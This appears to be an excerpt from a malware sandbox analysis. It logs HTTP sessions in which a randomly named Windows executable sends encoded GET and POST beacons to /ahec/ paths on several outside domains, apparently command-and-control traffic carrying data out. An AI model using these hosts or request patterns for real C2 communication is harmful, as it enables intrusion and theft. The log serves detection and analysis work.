                                                                        Dec 2, 2023 18:51:14.432070971 CET | 512 | OUT | GET /ahec/?Ot=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUdGE6T0LcUEcA==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.fam-scharf.net
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:14.637300014 CET | 428 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:14 GMT
                                                                        Server: Apache/2.4.58 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        33 | 192.168.2.10 | 49745 | 85.159.66.93 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:20.454240084 CET | 792 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.magmadokum.com
                                                                        Origin: http://www.magmadokum.com
                                                                        Referer: http://www.magmadokum.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=NFtq1frL3yg1waCB9ailcod5Z22NPFDUNWTkQPMceBueY9nN/uLnYiC3nfFaEmdQV6eFUCaxfgdRpL/rcwsEBvoYjrOSPDDKhLwTE4plPVTY7ou8FKo/NR0xnCpKapPFygudsnUZC48EjevMXbcz3nEV/BRwNkcMP/ar8Y7YaBqyeR04Gg==
                                                                        Dec 2, 2023 18:51:20.737898111 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.1
                                                                        Date: Sat, 02 Dec 2023 17:51:20 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        X-Rate-Limit-Limit: 5s
                                                                        X-Rate-Limit-Remaining: 19
                                                                        X-Rate-Limit-Reset: 2023-12-02T17:51:25.6272314Z


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        34 | 192.168.2.10 | 49746 | 85.159.66.93 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:23.200404882 CET | 812 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.magmadokum.com
                                                                        Origin: http://www.magmadokum.com
                                                                        Referer: http://www.magmadokum.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=NFtq1frL3yg1x6yB/9OleIdmVW2NBlDYNXvkQOYMZ0GeYfPN+vLndiC3s/FTJGdXV6CNUCWxfh9RpLPrfCEHH/oa3bOULDDKhLwTE7VPPVrY74e8KPc4Ax0wxSpKMpPByguFsiwjC6EEjffMXKc0+nEXgRQce3hfMsu0zZ/qYF7GbEYrBVp3uPw7YNi/Dh2RxuC8mGg=
                                                                        Dec 2, 2023 18:51:23.484241962 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.1
                                                                        Date: Sat, 02 Dec 2023 17:51:23 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        X-Rate-Limit-Limit: 5s
                                                                        X-Rate-Limit-Remaining: 18
                                                                        X-Rate-Limit-Reset: 2023-12-02T17:51:25.6272314Z


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        35 | 192.168.2.10 | 49747 | 85.159.66.93 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:26.871557951 CET | 1825 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.magmadokum.com
                                                                        Origin: http://www.magmadokum.com
                                                                        Referer: http://www.magmadokum.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:27.155056000 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.1
                                                                        Date: Sat, 02 Dec 2023 17:51:27 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        X-Rate-Limit-Limit: 5s
                                                                        X-Rate-Limit-Remaining: 19
                                                                        X-Rate-Limit-Reset: 2023-12-02T17:51:32.0444117Z


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        36 | 192.168.2.10 | 49748 | 85.159.66.93 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:29.623502016 CET | 512 | OUT | GET /ahec/?Ot=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvor1pzBMUzxhg==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.magmadokum.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:29.848659992 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.1
                                                                        Date: Sat, 02 Dec 2023 17:51:29 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        X-Rate-Limit-Limit: 5s
                                                                        X-Rate-Limit-Remaining: 19
                                                                        X-Rate-Limit-Reset: 2023-12-02T17:51:34.7376795Z


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        37 | 192.168.2.10 | 49749 | 162.241.252.161 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:35.305404902 CET | 810 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.thecoloringbitch.com
                                                                        Origin: http://www.thecoloringbitch.com
                                                                        Referer: http://www.thecoloringbitch.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=qDdKu90srGSGiP2/CEZ/bqTPL+04qVKsThKKcsV4cJykIPCrZ0lv86L3BsvvPsVzdau7LWhYmPcSxDFyjZwiUoCuXumgD0DKmnzdU30iRhzdwavps/fugkntqg2eJ/1oa0mnmIIPhJtdL6G1JkVQmlUESifRWFmpHa2Glpn2AzE9HjYj2Q==
                                                                        Dec 2, 2023 18:51:35.506577969 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:35 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        38 | 192.168.2.10 | 49750 | 162.241.252.161 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:38.028748989 CET | 830 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.thecoloringbitch.com
                                                                        Origin: http://www.thecoloringbitch.com
                                                                        Referer: http://www.thecoloringbitch.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8ikIuSrYxRv/6L3UcvQLsU/dazILU1YmL0SxGpykuctXYCoaOmmH0DKmnzdU3gERgbdxq/psd3p8UnygA2eYP1sa0nXmMAhhPhdL721Jx5TslUGWieGT02mPIafo8+zanVNG20wxpNa5clYyWPL5vBMDTHkfIw=
                                                                        Dec 2, 2023 18:51:38.231230974 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:38 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        39 | 192.168.2.10 | 49751 | 162.241.252.161 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:40.749174118 CET | 1843 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.thecoloringbitch.com
                                                                        Origin: http://www.thecoloringbitch.com
                                                                        Referer: http://www.thecoloringbitch.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:40.952306032 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:40 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        40 | 192.168.2.10 | 49752 | 162.241.252.161 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:44.660860062 CET | 518 | OUT | GET /ahec/?Ot=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA7WUc9X1BQW9lg==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.thecoloringbitch.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:44.861386061 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:44 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        41 | 192.168.2.10 | 49753 | 185.74.252.11 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:50.721636057 CET | 792 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.altralogos.com
                                                                        Origin: http://www.altralogos.com
                                                                        Referer: http://www.altralogos.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=6nAY1pwJurF3mZVtqhojcS/pFQNd+epjZZwgNA6lWwEmm2L9MDFjsJ3WOonTlAG8QdRNSG+n80O1LXif8wyQQKTvKNWvWX9YaqXLk7UwjLbflgk97Q68d5E8Ll34FFFQhvdI0rKZvlQlXOZM7HX6pr5QaqvAaDmv7GravhFw3O3lrvGfXQ==
                                                                        Dec 2, 2023 18:51:51.892266989 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:50 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        42 | 192.168.2.10 | 49754 | 185.74.252.11 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:53.427474022 CET | 812 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.altralogos.com
                                                                        Origin: http://www.altralogos.com
                                                                        Referer: http://www.altralogos.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:54.575953007 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:52 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        43 | 192.168.2.10 | 49755 | 185.74.252.11 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:56.129822969 CET | 1825 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.altralogos.com
                                                                        Origin: http://www.altralogos.com
                                                                        Referer: http://www.altralogos.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:57.526902914 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:55 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        44 | 192.168.2.10 | 49756 | 185.74.252.11 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:58.835238934 CET | 512 | OUT | GET /ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.altralogos.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:59.549618006 CET | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Sat, 02 Dec 2023 17:51:58 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Location: http://altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZl
                                                                        Content-Length: 0
                                                                        Content-Type: text/html; charset=UTF-8


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        45 | 192.168.2.10 | 49757 | 107.178.250.177 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:52:05.609568119 CET | 780 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.77moea.top
                                                                        Origin: http://www.77moea.top
                                                                        Referer: http://www.77moea.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=b6dZwGuJuttsODTyADATFS8YXfe9+c/KsiHBeVgv7Mw7Z0MpurtFh0PneYnfllrfWKXkMvnj8U1wNPiEQLvgyZbRlFmvHy7dan9xYd/wkhSF12dUegQIMT5fsBpQsbWzWE/KBunGKchOef5upWqruBslfgjDLrHfwgX/OqOvREaQjBq6ng==
                                                                        Dec 2, 2023 18:52:05.896513939 CET | 230 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:52:05 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:52:05.899106979 CET | 211 | IN | Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        46 | 192.168.2.10 | 49758 | 107.178.250.177 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:52:08.233582973 CET | 800 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.77moea.top
                                                                        Origin: http://www.77moea.top
                                                                        Referer: http://www.77moea.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq64c7eRgpvqtFi0PnGomXhlrEWKrsMrnj8VVwNPSER6vhyJbTjFmtDy7dan9xYd7akhKF1FVURi4JGz5cmhpQobW3WE+fBv7oKepOeelupHqqhBsnQAiBNp22yBGFPPuANAOOiUGpgcNJ91I1Gn7sAIfSpyksRB4=
                                                                        Dec 2, 2023 18:52:08.520580053 CET | 380 | IN | HTTP/1.1 405 Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:52:08 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        47 | 192.168.2.10 | 49759 | 107.178.250.177 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:52:10.858983994 CET | 1813 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.77moea.top
                                                                        Origin: http://www.77moea.top
                                                                        Referer: http://www.77moea.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
